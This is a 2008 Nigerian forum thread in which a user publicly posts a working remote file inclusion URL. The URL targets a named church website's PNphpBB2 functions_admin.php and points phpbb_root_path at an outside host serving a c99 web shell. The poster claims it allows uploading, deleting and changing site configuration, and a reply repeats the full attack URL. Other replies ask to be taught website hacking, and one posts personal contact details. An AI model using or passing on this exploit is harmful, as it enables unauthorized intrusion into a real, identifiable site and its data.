A Bug In Latterrainassembly.org "later Days Assembly Church"

Welcome. Please Login, Register, Or Activate! 
type your username and password to login
Date: November 24, 2009, 11:29 AM
431769 members and 298761 Topics
Latest Member: morgines50
Nairaland [Nigerian Forum] Home Help Search Who is currently online? Login Register
Nairaland Forum  |  Technology  |  Programming  |  A Bug In Latterrainassembly.org "later Days Assembly Church"
Pages: (1) Go Down Send this topic Notify of replies
Author Topic: A Bug In Latterrainassembly.org "later Days Assembly Church"  (Read 580 views)
louis400 (m)
A Bug In Latterrainassembly.org "later Days Assembly Church"
« on: September 23, 2008, 11:14 AM »

Hmm, Brothers and Sisters, I greet you in the name of the Lord. Learn from this,
   I think I found a bug on http://www.latterrainassembly.org , wiw, the bug lies on functions_admin.php, on the folder /includes, below is the link am talking of

http://www.latterrainassembly.org/church//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
 and my exploit for search is functions_admin.php?phpbb_root_path= "PNphpBB2/includes" my injection is a c99 rfi injection,  see below,
http://codedviro.50webs.com/mypass.php??
 injecting this two together, you will have

http://www.latterrainassembly.org/church//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://codedviro.50webs.com/mypass.php??

This is a direct link to the database of this site, you can execute if allowd the following commands, upload, delete, change config and many more. Another church site with this kind of problem in Nigeria here is that of Rhema, but I can show that here for persona reasons.

 Please if you are a member here go patch it ooooooooo before it gets into wrong hands.
logica
Re: A Bug In Latterrainassembly.org "later Days Assembly Church"
« #1 on: September 23, 2008, 12:33 PM »

does the site have the email address of the webmaster?
switchmax
Re: A Bug In Latterrainassembly.org "later Days Assembly Church"
« #2 on: September 24, 2008, 11:41 AM »

louis,
I have tried to access the link but i am finding it difficult.i want to learn how you come about the hacking of websites and how to have websites secure for atleast 70%.send me email on wealthyemah@yahoo.com or my number and lets talk 08022168341
http://www.latterrainassembly.org/church//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
 and my exploit for search is functions_admin.php?phpbb_root_path= "PNphpBB2/includes" my injection is a c99 rfi injection,  see below,
http://codedviro.50webs.com/mypass.php??
 injecting this two together, you will have
rancetech (m)
Re: A Bug In Latterrainassembly.org "later Days Assembly Church"
« #3 on: September 24, 2008, 12:45 PM »

@poster

Did you hack that website?

I'm kind of convinced you hacked that website.

How did you come about the flaw? Poking around, I guess.
louis400 (m)
Re: A Bug In Latterrainassembly.org "later Days Assembly Church"
« #4 on: September 25, 2008, 02:08 AM »

Mark this saying, there is no secure system in the world, it depends on how and what you want to do with them, like a popular bank in Europe recently got hacked with telnet, what exactly u want to know on webs and this will also depend on the application the web is running on,  thanks friends.
switchmax
Re: A Bug In Latterrainassembly.org "later Days Assembly Church"
« #5 on: September 25, 2008, 11:16 AM »

 louis,
I want to know how to hack website built on php or java though am using php in any website design and am also interested in security lapses in some of our websites.I want to have an idea on how you porch on websites just to learn some funny things from you.i know there is no website that is 100% security free but i want an idea on 70% security lapses in websites.if you can teach me let me know or send me an email wealthyemah@yahoo.com
 Latest It Certification Dumps  Sir What Is Different Between Programmer And Non-programmer?  Ebooks On Fortran77 Or Later Versions   Page 2
Pages: (1) Go Up Send Topic to Friend by E-mail Reply 


Sections: Autos/Cars (2) Jobs/Vacancies (2) (3) Career Talk Education General(2) Politics Romance Computers Phones Travel
Sports Fashion Health Religion Celebrities TV/Movies (2) Music/Radio (2) Books Webmasters Programming

Links: Page1 Page2 Page3 Page4 Page5 Page6 Page7 Page8 Page9 Page10

Nairaland is owned by Oluwaseun Osewa. See also: Nairalist Classified Ads
Nairaland Forum | Powered by SMF 1.0.12.
© 2001-2005, Lewis Media. All Rights Reserved.